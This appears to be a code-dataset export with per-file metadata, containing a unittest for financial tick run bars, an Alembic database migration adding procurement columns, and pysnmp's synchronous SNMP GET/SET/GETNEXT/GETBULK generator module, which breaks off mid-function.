        self.assertTrue(np.all(db1.values == db4.values))
        self.assertTrue(np.all(thresh_1.cum_theta_buy == thresh_2.cum_theta_buy))
        self.assertTrue(np.all(thresh_1.cum_theta_sell == thresh_2.cum_theta_sell))
        # Assert OHLC is correct (the first value)
        self.assertEqual(db1.loc[0, 'open'], 1306.0)
        self.assertEqual(db1.loc[0, 'high'], 1306.0)
        self.assertEqual(db1.loc[0, 'low'], 1303.00)
        self.assertEqual(db1.loc[0, 'close'], 1305.75)
        # Assert OHLC is correct (the third value)
        self.assertEqual(db1.loc[2, 'open'], 1306.0)
        self.assertEqual(db1.loc[2, 'high'], 1307.75)
        self.assertEqual(db1.loc[2, 'low'], 1305.75)
        self.assertEqual(db1.loc[2, 'close'], 1307.75)
        self.assertTrue((db1.loc[:, 'high'] >= db1.loc[:, 'low']).all())
        self.assertTrue((db1.loc[:, 'volume'] >= db1.loc[:, 'cum_buy_volume']).all())
        # Delete generated csv file (if it wasn't generated test would fail)
        os.remove('test.csv')

    def test_const_run_tick_bars(self):
        """
        Tests the Const run tick bars implementation.
        """
        exp_num_ticks_init = 1000
        num_prev_bars = 3
        db1, thresh_1 = ds.get_const_tick_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
                                                   expected_imbalance_window=10000,
                                                   num_prev_bars=num_prev_bars, batch_size=2e7, verbose=False,
                                                   analyse_thresholds=True)
        db2, thresh_2 = ds.get_const_tick_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
                                                   expected_imbalance_window=10000,
                                                   num_prev_bars=num_prev_bars, batch_size=50, verbose=False,
                                                   analyse_thresholds=True)
        db3, _ = ds.get_const_tick_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
                                            expected_imbalance_window=10000,
                                            num_prev_bars=num_prev_bars, batch_size=10, verbose=False)
        ds.get_const_tick_run_bars(self.path, exp_num_ticks_init=exp_num_ticks_init,
                                   expected_imbalance_window=10000,
                                   num_prev_bars=num_prev_bars, batch_size=50, verbose=False,
                                   to_csv=True, output_path='test.csv')
        db4 = pd.read_csv('test.csv', parse_dates=[0])
        self.assertEqual(db1.shape, (9, 10))
        # Assert diff batch sizes have same number of bars
        self.assertTrue(db1.shape == db2.shape)
        self.assertTrue(db1.shape == db3.shape)
        self.assertTrue(db1.shape == db4.shape)
        # Assert same values
        self.assertTrue(np.all(db1.values == db2.values))
        self.assertTrue(np.all(db1.values == db3.values))
        self.assertTrue(np.all(db1.values == db4.values))
        self.assertTrue(np.all(thresh_1.cum_theta_buy == thresh_2.cum_theta_buy))
        self.assertTrue(np.all(thresh_1.cum_theta_sell == thresh_2.cum_theta_sell))
        # Assert OHLC is correct (the first value)
        self.assertEqual(db1.loc[0, 'open'], 1306.0)
        self.assertEqual(db1.loc[0, 'high'], 1306.0)
        self.assertEqual(db1.loc[0, 'low'], 1303.00)
        self.assertEqual(db1.loc[0, 'close'], 1305.75)
        # Assert OHLC is correct (the third value)
        self.assertEqual(db1.loc[2, 'open'], 1306.0)
        self.assertEqual(db1.loc[2, 'high'], 1307.5)
        self.assertEqual(db1.loc[2, 'low'], 1305.75)
        self.assertEqual(db1.loc[2, 'close'], 1307.5)
        self.assertTrue((db1.loc[:, 'high'] >= db1.loc[:, 'low']).all())
        self.assertTrue((db1.loc[:, 'volume'] >= db1.loc[:, 'cum_buy_volume']).all())
        # Delete generated csv file (if it wasn't generated test would fail)
        os.remove('test.csv')

    def test_csv_format(self):
        """
        Asserts that the csv data being passed is of the correct format.
        """
        wrong_date = ['2019-41-30', 200.00, np.int64(5)]
        wrong_price = ['2019-01-30', 'asd', np.int64(5)]
        wrong_volume = ['2019-01-30', 200.00, '1.5']
        too_many_cols = ['2019-01-30', 200.00,
                         np.int64(5), 'Limit order', 'B23']
        # pylint: disable=protected-access
        # Bug fix: pass the callable and its argument separately to assertRaises.
        # The original code called _assert_csv eagerly, so any exception escaped
        # before assertRaises could trap it.
        self.assertRaises(ValueError,
                          ds.BaseRunBars._assert_csv,
                          pd.DataFrame(wrong_date).T)
        # pylint: disable=protected-access
        self.assertRaises(AssertionError,
                          ds.BaseRunBars._assert_csv,
                          pd.DataFrame(too_many_cols).T)
        # pylint: disable=protected-access
        self.assertRaises(AssertionError,
                          ds.BaseRunBars._assert_csv,
                          pd.DataFrame(wrong_price).T)
        # pylint: disable=protected-access
        self.assertRaises(AssertionError,
                          ds.BaseRunBars._assert_csv,
                          pd.DataFrame(wrong_volume).T)
| 50.348786
| 112
| 0.573439
| 2,856
| 22,808
| 4.317927
| 0.056723
| 0.040869
| 0.064223
| 0.07663
| 0.940399
| 0.935209
| 0.914937
| 0.907395
| 0.904882
| 0.902368
| 0
| 0.060224
| 0.318572
| 22,808
| 452
| 113
| 50.460177
| 0.733239
| 0.098606
| 0
| 0.786667
| 0
| 0
| 0.033384
| 0.001775
| 0
| 0
| 0
| 0
| 0.46
| 1
| 0.03
| false
| 0
| 0.016667
| 0
| 0.05
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7d6cd140c30864ce1cdf005b63ddcbbd8e689f66
| 4,727
|
py
|
Python
|
dataactcore/migrations/versions/2ae156c8f46d_update_d1_and_d2_for_daims_v1_1.py
|
brianherman/data-act-broker-backend
|
80eb055b9d245046192f7ad4fd0be7d0e11d2dec
|
[
"CC0-1.0"
] | 1
|
2019-06-22T21:53:16.000Z
|
2019-06-22T21:53:16.000Z
|
dataactcore/migrations/versions/2ae156c8f46d_update_d1_and_d2_for_daims_v1_1.py
|
brianherman/data-act-broker-backend
|
80eb055b9d245046192f7ad4fd0be7d0e11d2dec
|
[
"CC0-1.0"
] | 3
|
2021-08-22T11:47:45.000Z
|
2022-03-29T22:06:49.000Z
|
dataactcore/migrations/versions/2ae156c8f46d_update_d1_and_d2_for_daims_v1_1.py
|
brianherman/data-act-broker-backend
|
80eb055b9d245046192f7ad4fd0be7d0e11d2dec
|
[
"CC0-1.0"
] | 1
|
2020-07-17T23:50:56.000Z
|
2020-07-17T23:50:56.000Z
|
"""update d1 and d2 for daims v1.1
Revision ID: 2ae156c8f46d
Revises: 4b1ee78268fb
Create Date: 2017-08-28 15:16:00.926683
"""
# revision identifiers, used by Alembic.
revision = '2ae156c8f46d'  # unique id of this migration
down_revision = '4b1ee78268fb'  # parent revision in the migration chain
branch_labels = None  # no named branches for this revision
depends_on = None  # no cross-branch dependencies
from alembic import op
import sqlalchemy as sa
def upgrade(engine_name):
    """Look up and invoke the engine-specific upgrade routine.

    Resolves ``upgrade_<engine_name>`` in this module's globals and calls it.
    """
    handler = globals()["upgrade_%s" % engine_name]
    handler()
def downgrade(engine_name):
    """Look up and invoke the engine-specific downgrade routine.

    Resolves ``downgrade_<engine_name>`` in this module's globals and calls it.
    """
    handler = globals()["downgrade_%s" % engine_name]
    handler()
def upgrade_data_broker():
### commands auto generated by Alembic - please adjust! ###
op.add_column('award_procurement', sa.Column('award_or_idv_flag', sa.Text(), nullable=True))
op.add_column('award_procurement', sa.Column('place_of_perform_country_n', sa.Text(), nullable=True))
op.add_column('award_procurement', sa.Column('place_of_perform_county_na', sa.Text(), nullable=True))
op.add_column('award_procurement', sa.Column('place_of_perform_state_nam', sa.Text(), nullable=True))
op.add_column('award_procurement', sa.Column('referenced_idv_agency_name', sa.Text(), nullable=True))
op.add_column('award_procurement', sa.Column('referenced_idv_type', sa.Text(), nullable=True))
op.add_column('award_procurement', sa.Column('referenced_multi_or_single', sa.Text(), nullable=True))
op.add_column('detached_award_procurement', sa.Column('place_of_perform_country_n', sa.Text(), nullable=True))
op.add_column('detached_award_procurement', sa.Column('place_of_perform_state_nam', sa.Text(), nullable=True))
op.add_column('detached_award_procurement', sa.Column('referenced_idv_agency_name', sa.Text(), nullable=True))
op.add_column('detached_award_procurement', sa.Column('referenced_multi_or_single', sa.Text(), nullable=True))
op.add_column('detached_award_procurement', sa.Column('award_or_idv_flag', sa.Text(), nullable=True))
op.add_column('award_financial_assistance', sa.Column('legal_entity_country_name', sa.Text(), nullable=True))
op.add_column('award_financial_assistance', sa.Column('place_of_perform_country_n', sa.Text(), nullable=True))
op.add_column('award_financial_assistance', sa.Column('place_of_perform_county_co', sa.Text(), nullable=True))
op.add_column('detached_award_financial_assistance', sa.Column('legal_entity_country_name', sa.Text(), nullable=True))
op.add_column('detached_award_financial_assistance', sa.Column('place_of_perform_country_n', sa.Text(), nullable=True))
op.add_column('detached_award_financial_assistance', sa.Column('place_of_perform_county_co', sa.Text(), nullable=True))
op.add_column('published_award_financial_assistance', sa.Column('legal_entity_country_name', sa.Text(), nullable=True))
op.add_column('published_award_financial_assistance', sa.Column('place_of_perform_country_n', sa.Text(), nullable=True))
op.add_column('published_award_financial_assistance', sa.Column('place_of_perform_county_co', sa.Text(), nullable=True))
### end Alembic commands ###
def downgrade_data_broker():
    ### commands auto generated by Alembic - please adjust! ###
    # Reverse of the corresponding upgrade: drop each added column,
    # in the same order the original hand-written statements used.
    columns_to_drop = [
        ('published_award_financial_assistance', 'place_of_perform_county_co'),
        ('published_award_financial_assistance', 'place_of_perform_country_n'),
        ('published_award_financial_assistance', 'legal_entity_country_name'),
        ('detached_award_financial_assistance', 'place_of_perform_county_co'),
        ('detached_award_financial_assistance', 'place_of_perform_country_n'),
        ('detached_award_financial_assistance', 'legal_entity_country_name'),
        ('award_financial_assistance', 'place_of_perform_county_co'),
        ('award_financial_assistance', 'place_of_perform_country_n'),
        ('award_financial_assistance', 'legal_entity_country_name'),
        ('detached_award_procurement', 'referenced_multi_or_single'),
        ('detached_award_procurement', 'referenced_idv_agency_name'),
        ('detached_award_procurement', 'place_of_perform_state_nam'),
        ('detached_award_procurement', 'place_of_perform_country_n'),
        ('detached_award_procurement', 'award_or_idv_flag'),
        ('award_procurement', 'referenced_multi_or_single'),
        ('award_procurement', 'referenced_idv_type'),
        ('award_procurement', 'referenced_idv_agency_name'),
        ('award_procurement', 'place_of_perform_state_nam'),
        ('award_procurement', 'place_of_perform_county_na'),
        ('award_procurement', 'place_of_perform_country_n'),
        ('award_procurement', 'award_or_idv_flag'),
    ]
    for table_name, column_name in columns_to_drop:
        op.drop_column(table_name, column_name)
    ### end Alembic commands ###
| 58.358025
| 124
| 0.78168
| 656
| 4,727
| 5.20122
| 0.129573
| 0.112544
| 0.09027
| 0.110785
| 0.88306
| 0.880129
| 0.860199
| 0.840563
| 0.828253
| 0.763775
| 0
| 0.012076
| 0.089063
| 4,727
| 80
| 125
| 59.0875
| 0.780307
| 0.065369
| 0
| 0
| 0
| 0
| 0.493157
| 0.404197
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074074
| false
| 0
| 0.037037
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7d891439bed408c68a6815646024fc4d6d381f1a
| 23,241
|
py
|
Python
|
applied_python/applied_python/lib/python2.7/site-packages/pysnmp/hlapi/asyncore/sync/cmdgen.py
|
mith1979/ansible_automation
|
013dfa67c6d91720b787fadb21de574b6e023a26
|
[
"Apache-2.0"
] | null | null | null |
applied_python/applied_python/lib/python2.7/site-packages/pysnmp/hlapi/asyncore/sync/cmdgen.py
|
mith1979/ansible_automation
|
013dfa67c6d91720b787fadb21de574b6e023a26
|
[
"Apache-2.0"
] | null | null | null |
applied_python/applied_python/lib/python2.7/site-packages/pysnmp/hlapi/asyncore/sync/cmdgen.py
|
mith1979/ansible_automation
|
013dfa67c6d91720b787fadb21de574b6e023a26
|
[
"Apache-2.0"
] | null | null | null |
#
# This file is part of pysnmp software.
#
# Copyright (c) 2005-2016, Ilya Etingof <ilya@glas.net>
# License: http://pysnmp.sf.net/license.html
#
from sys import version_info
from pysnmp.hlapi.asyncore import cmdgen
from pysnmp.hlapi.varbinds import *
from pysnmp.proto.rfc1905 import endOfMibView
from pysnmp.proto import errind
from pyasn1.type.univ import Null
__all__ = ['getCmd', 'nextCmd', 'setCmd', 'bulkCmd']
# Compatibility shim: Python < 2.6 has no builtin next(); export a
# module-level fallback that delegates to the iterator's .next() method.
if version_info[:2] < (2, 6):
    __all__.append('next')

    def next(iter):
        """Return the next item from *iter* (pre-2.6 compatibility)."""
        return iter.next()
def getCmd(snmpEngine, authData, transportTarget, contextData,
           *varBinds, **options):
    """Create a generator performing one or more SNMP GET queries.

    Each iteration sends a single SNMP GET request
    (:RFC:`1905#section-4.2.1`) and blocks until a response arrives or
    an error occurs.

    Parameters
    ----------
    snmpEngine : :py:class:`~pysnmp.hlapi.SnmpEngine`
        Class instance representing SNMP engine.
    authData : :py:class:`~pysnmp.hlapi.CommunityData` or :py:class:`~pysnmp.hlapi.UsmUserData`
        Class instance representing SNMP credentials.
    transportTarget : :py:class:`~pysnmp.hlapi.asyncore.UdpTransportTarget` or :py:class:`~pysnmp.hlapi.asyncore.Udp6TransportTarget`
        Class instance representing transport type along with SNMP peer address.
    contextData : :py:class:`~pysnmp.hlapi.ContextData`
        Class instance representing SNMP ContextEngineId and ContextName values.
    \*varBinds : :py:class:`~pysnmp.smi.rfc1902.ObjectType`
        One or more class instances representing MIB variables to place
        into SNMP request.

    Other Parameters
    ----------------
    \*\*options :
        Request options:

        * `lookupMib` - load MIB and resolve response MIB variables at
          the cost of slightly reduced performance. Default is `True`.

    Yields
    ------
    errorIndication : str
        True value indicates SNMP engine error.
    errorStatus : str
        True value indicates SNMP PDU error.
    errorIndex : int
        Non-zero value refers to `varBinds[errorIndex-1]`
    varBinds : tuple
        A sequence of :py:class:`~pysnmp.smi.rfc1902.ObjectType` class
        instances representing MIB variables returned in SNMP response.

    Raises
    ------
    PySnmpError
        Or its derivative indicating that an error occurred while
        performing SNMP operation.

    Notes
    -----
    The `getCmd` generator will be exhausted immediately unless a new
    sequence of `varBinds` is sent back into the running generator
    (supported since Python 2.6).

    Examples
    --------
    >>> from pysnmp.hlapi.asyncore import *
    >>> g = getCmd(SnmpEngine(),
    ...            CommunityData('public'),
    ...            UdpTransportTarget(('demo.snmplabs.com', 161)),
    ...            ContextData(),
    ...            ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0)))
    >>> next(g)
    (None, 0, 0, [ObjectType(ObjectIdentity(ObjectName('1.3.6.1.2.1.1.1.0')), DisplayString('SunOS zeus.snmplabs.com 4.1.3_U1 1 sun4m'))])
    >>>
    """
    def cbFun(snmpEngine, sendRequestHandle,
              errorIndication, errorStatus, errorIndex,
              varBinds, cbCtx):
        # Stash the asynchronous response details for the loop below.
        cbCtx['errorIndication'] = errorIndication
        cbCtx['errorStatus'] = errorStatus
        cbCtx['errorIndex'] = errorIndex
        cbCtx['varBinds'] = varBinds

    response = {}

    while True:
        if not varBinds:
            # Nothing to query: yield an empty result and wait for the
            # caller to send() in a fresh sequence of varBinds.
            varBinds = (yield None, None, None, [])
            if not varBinds:
                break
            continue

        cmdgen.getCmd(snmpEngine, authData, transportTarget,
                      contextData, *varBinds,
                      cbFun=cbFun, cbCtx=response,
                      lookupMib=options.get('lookupMib', True))

        # Block until cbFun has populated `response`.
        snmpEngine.transportDispatcher.runDispatcher()

        varBinds = (yield response['errorIndication'],
                    response['errorStatus'],
                    response['errorIndex'],
                    response['varBinds'])

        if not varBinds:
            break
def setCmd(snmpEngine, authData, transportTarget, contextData,
           *varBinds, **options):
    """Create a generator performing one or more SNMP SET queries.

    Each iteration sends a single SNMP SET request
    (:RFC:`1905#section-4.2.5`) and blocks until a response arrives or
    an error occurs.

    Parameters
    ----------
    snmpEngine : :py:class:`~pysnmp.hlapi.SnmpEngine`
        Class instance representing SNMP engine.
    authData : :py:class:`~pysnmp.hlapi.CommunityData` or :py:class:`~pysnmp.hlapi.UsmUserData`
        Class instance representing SNMP credentials.
    transportTarget : :py:class:`~pysnmp.hlapi.asyncore.UdpTransportTarget` or :py:class:`~pysnmp.hlapi.asyncore.Udp6TransportTarget`
        Class instance representing transport type along with SNMP peer address.
    contextData : :py:class:`~pysnmp.hlapi.ContextData`
        Class instance representing SNMP ContextEngineId and ContextName values.
    \*varBinds : :py:class:`~pysnmp.smi.rfc1902.ObjectType`
        One or more class instances representing MIB variables to place
        into SNMP request.

    Other Parameters
    ----------------
    \*\*options :
        Request options:

        * `lookupMib` - load MIB and resolve response MIB variables at
          the cost of slightly reduced performance. Default is `True`.

    Yields
    ------
    errorIndication : str
        True value indicates SNMP engine error.
    errorStatus : str
        True value indicates SNMP PDU error.
    errorIndex : int
        Non-zero value refers to `varBinds[errorIndex-1]`
    varBinds : tuple
        A sequence of :py:class:`~pysnmp.smi.rfc1902.ObjectType` class
        instances representing MIB variables returned in SNMP response.

    Raises
    ------
    PySnmpError
        Or its derivative indicating that an error occurred while
        performing SNMP operation.

    Notes
    -----
    The `setCmd` generator will be exhausted immediately unless a new
    sequence of `varBinds` is sent back into the running generator
    (supported since Python 2.6).

    Examples
    --------
    >>> from pysnmp.hlapi.asyncore import *
    >>> g = setCmd(SnmpEngine(),
    ...            CommunityData('public'),
    ...            UdpTransportTarget(('demo.snmplabs.com', 161)),
    ...            ContextData(),
    ...            ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0), 'Linux i386'))
    >>> next(g)
    (None, 0, 0, [ObjectType(ObjectIdentity(ObjectName('1.3.6.1.2.1.1.1.0')), DisplayString('Linux i386'))])
    >>>
    """
    def cbFun(snmpEngine, sendRequestHandle,
              errorIndication, errorStatus, errorIndex,
              varBinds, cbCtx):
        # Stash the asynchronous response details for the loop below.
        cbCtx['errorIndication'] = errorIndication
        cbCtx['errorStatus'] = errorStatus
        cbCtx['errorIndex'] = errorIndex
        cbCtx['varBinds'] = varBinds

    response = {}

    while True:
        if not varBinds:
            # Nothing to set: yield an empty result and wait for the
            # caller to send() in a fresh sequence of varBinds.
            varBinds = (yield None, None, None, [])
            if not varBinds:
                break
            continue

        cmdgen.setCmd(snmpEngine, authData, transportTarget,
                      contextData, *varBinds,
                      cbFun=cbFun, cbCtx=response,
                      lookupMib=options.get('lookupMib', True))

        # Block until cbFun has populated `response`.
        snmpEngine.transportDispatcher.runDispatcher()

        varBinds = (yield response['errorIndication'],
                    response['errorStatus'],
                    response['errorIndex'],
                    response['varBinds'])

        if not varBinds:
            break
def nextCmd(snmpEngine, authData, transportTarget, contextData,
            *varBinds, **options):
    """Creates a generator to perform one or more SNMP GETNEXT queries.

    On each iteration, a new SNMP GETNEXT request is sent
    (:RFC:`1905#section-4.2.2`). The iterator blocks waiting for response
    to arrive or error to occur.

    Parameters
    ----------
    snmpEngine : :py:class:`~pysnmp.hlapi.SnmpEngine`
        Class instance representing SNMP engine.
    authData : :py:class:`~pysnmp.hlapi.CommunityData` or :py:class:`~pysnmp.hlapi.UsmUserData`
        Class instance representing SNMP credentials.
    transportTarget : :py:class:`~pysnmp.hlapi.asyncore.UdpTransportTarget` or :py:class:`~pysnmp.hlapi.asyncore.Udp6TransportTarget`
        Class instance representing transport type along with SNMP peer address.
    contextData : :py:class:`~pysnmp.hlapi.ContextData`
        Class instance representing SNMP ContextEngineId and ContextName values.
    \*varBinds : :py:class:`~pysnmp.smi.rfc1902.ObjectType`
        One or more class instances representing MIB variables to place
        into SNMP request.

    Other Parameters
    ----------------
    \*\*options :
        Request options:

        * `lookupMib` - load MIB and resolve response MIB variables at
          the cost of slightly reduced performance. Default is `True`.
        * `lexicographicMode` - stop iteration when all response MIB
          variables leave the scope of initial MIB variables in
          `varBinds`. Default is `True`.
        * `ignoreNonIncreasingOid` - continue iteration even if response
          MIB variables (OIDs) are not greater than request MIB variables.
          Default is `False`.
        * `maxRows` - stop iteration once this generator instance processed
          `maxRows` of SNMP conceptual table. Default is `0` (no limit).
        * `maxCalls` - stop iteration once this generator instance processed
          `maxCalls` responses. Default is 0 (no limit).

    Yields
    ------
    errorIndication : str
        True value indicates SNMP engine error.
    errorStatus : str
        True value indicates SNMP PDU error.
    errorIndex : int
        Non-zero value refers to `varBinds[errorIndex-1]`
    varBinds : tuple
        A sequence of :py:class:`~pysnmp.smi.rfc1902.ObjectType` class
        instances representing MIB variables returned in SNMP response.

    Raises
    ------
    PySnmpError
        Or its derivative indicating that an error occurred while
        performing SNMP operation.

    Notes
    -----
    The `nextCmd` generator will be exhausted on any of the following
    conditions:

    * SNMP engine error occurs thus `errorIndication` is `True`
    * SNMP PDU `errorStatus` is reported as `True`
    * SNMP :py:class:`~pysnmp.proto.rfc1905.EndOfMibView` values
      (also known as *SNMP exception values*) are reported for all
      MIB variables in `varBinds`
    * *lexicographicMode* option is set to `False` and all
      response MIB variables leave the scope of `varBinds`

    At any moment a new sequence of `varBinds` could be sent back into
    running generator (supported since Python 2.6).

    Examples
    --------
    >>> from pysnmp.hlapi.asyncore import *
    >>> g = nextCmd(SnmpEngine(),
    ...             CommunityData('public'),
    ...             UdpTransportTarget(('demo.snmplabs.com', 161)),
    ...             ContextData(),
    ...             ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr')))
    >>> next(g)
    (None, 0, 0, [ObjectType(ObjectIdentity(ObjectName('1.3.6.1.2.1.1.1.0')), DisplayString('SunOS zeus.snmplabs.com 4.1.3_U1 1 sun4m'))])
    >>> g.send( [ ObjectType(ObjectIdentity('IF-MIB', 'ifInOctets')) ] )
    (None, 0, 0, [(ObjectName('1.3.6.1.2.1.2.2.1.10.1'), Counter32(284817787))])
    """
    def cbFun(snmpEngine, sendRequestHandle,
              errorIndication, errorStatus, errorIndex,
              varBindTable, cbCtx):
        # Capture asynchronous response details for the loop below.
        cbCtx['errorIndication'] = errorIndication
        cbCtx['errorStatus'] = errorStatus
        cbCtx['errorIndex'] = errorIndex
        cbCtx['varBindTable'] = varBindTable

    lexicographicMode = options.get('lexicographicMode', True)
    ignoreNonIncreasingOid = options.get('ignoreNonIncreasingOid', False)
    maxRows = options.get('maxRows', 0)
    maxCalls = options.get('maxCalls', 0)

    cbCtx = {}

    vbProcessor = CommandGeneratorVarBinds()

    # OIDs of the initial request; used below to detect when a response
    # variable walks out of the requested subtree (non-lexicographic mode).
    initialVars = [x[0] for x in vbProcessor.makeVarBinds(snmpEngine, varBinds)]

    totalRows = totalCalls = 0

    while True:
        if varBinds:
            # Issue GETNEXT for the OIDs only (values replaced with Null).
            cmdgen.nextCmd(snmpEngine, authData, transportTarget, contextData,
                           *[(x[0], Null()) for x in varBinds],
                           **dict(cbFun=cbFun, cbCtx=cbCtx,
                                  lookupMib=options.get('lookupMib', True)))

            # Block until cbFun has populated cbCtx.
            snmpEngine.transportDispatcher.runDispatcher()

            errorIndication = cbCtx['errorIndication']
            errorStatus = cbCtx['errorStatus']
            errorIndex = cbCtx['errorIndex']

            if ignoreNonIncreasingOid and errorIndication and \
                    isinstance(errorIndication, errind.OidNotIncreasing):
                errorIndication = None

            if errorIndication:
                yield errorIndication, errorStatus, errorIndex, varBinds
                return
            elif errorStatus:
                if errorStatus == 2:
                    # Hide SNMPv1 noSuchName error which leaks in here
                    # from SNMPv1 Agent through internal pysnmp proxy.
                    errorStatus = errorStatus.clone(0)
                    errorIndex = errorIndex.clone(0)
                yield errorIndication, errorStatus, errorIndex, varBinds
                return
            else:
                # First (and only) row of the GETNEXT var-bind table.
                varBinds = cbCtx['varBindTable'] and cbCtx['varBindTable'][0]

                # Keep iterating if at least one variable carries a real
                # value and is still in scope; otherwise (for/else) stop.
                for idx, varBind in enumerate(varBinds):
                    name, val = varBind
                    if not isinstance(val, Null):
                        if lexicographicMode or initialVars[idx].isPrefixOf(name):
                            break
                else:
                    return

                totalRows += 1
                totalCalls += 1
        else:
            errorIndication = errorStatus = errorIndex = None
            varBinds = []

        # Hand results to the caller; the caller may send() in a new
        # sequence of varBinds to re-scope the iteration.
        initialVarBinds = (yield errorIndication, errorStatus,
                           errorIndex, varBinds)

        if initialVarBinds:
            varBinds = initialVarBinds
            initialVars = [x[0] for x in vbProcessor.makeVarBinds(snmpEngine, varBinds)]

        if maxRows and totalRows >= maxRows or \
                maxCalls and totalCalls >= maxCalls:
            return
def bulkCmd(snmpEngine, authData, transportTarget, contextData,
            nonRepeaters, maxRepetitions, *varBinds, **options):
    """Creates a generator to perform one or more SNMP GETBULK queries.

    On each iteration, a new SNMP GETBULK request is sent
    (:RFC:`1905#section-4.2.3`). The iterator blocks waiting for response
    to arrive or error to occur.

    Parameters
    ----------
    snmpEngine : :py:class:`~pysnmp.hlapi.SnmpEngine`
        Class instance representing SNMP engine.
    authData : :py:class:`~pysnmp.hlapi.CommunityData` or :py:class:`~pysnmp.hlapi.UsmUserData`
        Class instance representing SNMP credentials.
    transportTarget : :py:class:`~pysnmp.hlapi.asyncore.UdpTransportTarget` or :py:class:`~pysnmp.hlapi.asyncore.Udp6TransportTarget`
        Class instance representing transport type along with SNMP peer address.
    contextData : :py:class:`~pysnmp.hlapi.ContextData`
        Class instance representing SNMP ContextEngineId and ContextName values.
    nonRepeaters : int
        One MIB variable is requested in response for the first
        `nonRepeaters` MIB variables in request.
    maxRepetitions : int
        `maxRepetitions` MIB variables are requested in response for each
        of the remaining MIB variables in the request (e.g. excluding
        `nonRepeaters`). Remote SNMP engine may choose lesser value than
        requested.
    \*varBinds : :py:class:`~pysnmp.smi.rfc1902.ObjectType`
        One or more class instances representing MIB variables to place
        into SNMP request.

    Other Parameters
    ----------------
    \*\*options :
        Request options:

        * `lookupMib` - load MIB and resolve response MIB variables at
          the cost of slightly reduced performance. Default is `True`.
        * `lexicographicMode` - stop iteration when all response MIB
          variables leave the scope of initial MIB variables in
          `varBinds`. Default is `True`.
        * `ignoreNonIncreasingOid` - continue iteration even if response
          MIB variables (OIDs) are not greater than request MIB variables.
          Default is `False`.
        * `maxRows` - stop iteration once this generator instance processed
          `maxRows` of SNMP conceptual table. Default is `0` (no limit).
        * `maxCalls` - stop iteration once this generator instance processed
          `maxCalls` responses. Default is 0 (no limit).

    Yields
    ------
    errorIndication : str
        True value indicates SNMP engine error.
    errorStatus : str
        True value indicates SNMP PDU error.
    errorIndex : int
        Non-zero value refers to \*varBinds[errorIndex-1]
    varBinds : tuple
        A sequence of :py:class:`~pysnmp.smi.rfc1902.ObjectType` class
        instances representing MIB variables returned in SNMP response.

    Raises
    ------
    PySnmpError
        Or its derivative indicating that an error occurred while
        performing SNMP operation.

    Notes
    -----
    The `bulkCmd` generator will be exhausted on any of the following
    conditions:

    * SNMP engine error occurs thus `errorIndication` is `True`
    * SNMP PDU `errorStatus` is reported as `True`
    * SNMP :py:class:`~pysnmp.proto.rfc1905.EndOfMibView` values
      (also known as *SNMP exception values*) are reported for all
      MIB variables in `varBinds`
    * *lexicographicMode* option is set to `False` and all
      response MIB variables leave the scope of `varBinds`

    At any moment a new sequence of `varBinds` could be sent back into
    running generator (supported since Python 2.6).

    Setting `maxRepetitions` value to 15..50 might significantly improve
    system performance, as many MIB variables get packed into a single
    response message at once.

    Examples
    --------
    >>> from pysnmp.hlapi.asyncore import *
    >>> g = bulkCmd(SnmpEngine(),
    ...             CommunityData('public'),
    ...             UdpTransportTarget(('demo.snmplabs.com', 161)),
    ...             ContextData(),
    ...             0, 25,
    ...             ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr')))
    >>> next(g)
    (None, 0, 0, [ObjectType(ObjectIdentity(ObjectName('1.3.6.1.2.1.1.1.0')), DisplayString('SunOS zeus.snmplabs.com 4.1.3_U1 1 sun4m'))])
    >>> g.send( [ ObjectType(ObjectIdentity('IF-MIB', 'ifInOctets')) ] )
    (None, 0, 0, [(ObjectName('1.3.6.1.2.1.2.2.1.10.1'), Counter32(284817787))])
    """
    def cbFun(snmpEngine, sendRequestHandle,
              errorIndication, errorStatus, errorIndex,
              varBindTable, cbCtx):
        # Capture asynchronous response details for the loop below.
        cbCtx['errorIndication'] = errorIndication
        cbCtx['errorStatus'] = errorStatus
        cbCtx['errorIndex'] = errorIndex
        cbCtx['varBindTable'] = varBindTable

    lexicographicMode = options.get('lexicographicMode', True)
    ignoreNonIncreasingOid = options.get('ignoreNonIncreasingOid', False)
    maxRows = options.get('maxRows', 0)
    maxCalls = options.get('maxCalls', 0)

    cbCtx = {}

    vbProcessor = CommandGeneratorVarBinds()

    # OIDs of the initial request; used to detect out-of-scope responses.
    initialVars = [x[0] for x in vbProcessor.makeVarBinds(snmpEngine, varBinds)]
    # Per-column flags: True once a column hit end-of-MIB or left scope.
    nullVarBinds = [False] * len(initialVars)

    totalRows = totalCalls = 0
    stopFlag = False

    while not stopFlag:
        if maxRows and totalRows < maxRows:
            # Do not request more rows than the maxRows budget allows.
            maxRepetitions = min(maxRepetitions, maxRows - totalRows)

        # Issue GETBULK for the OIDs only (values replaced with Null).
        cmdgen.bulkCmd(snmpEngine, authData, transportTarget, contextData,
                       nonRepeaters, maxRepetitions,
                       *[(x[0], Null()) for x in varBinds],
                       **dict(cbFun=cbFun, cbCtx=cbCtx,
                              lookupMib=options.get('lookupMib', True)))

        # Block until cbFun has populated cbCtx.
        snmpEngine.transportDispatcher.runDispatcher()

        errorIndication = cbCtx['errorIndication']
        errorStatus = cbCtx['errorStatus']
        errorIndex = cbCtx['errorIndex']
        varBindTable = cbCtx['varBindTable']

        if ignoreNonIncreasingOid and errorIndication and \
                isinstance(errorIndication, errind.OidNotIncreasing):
            errorIndication = None

        if errorIndication:
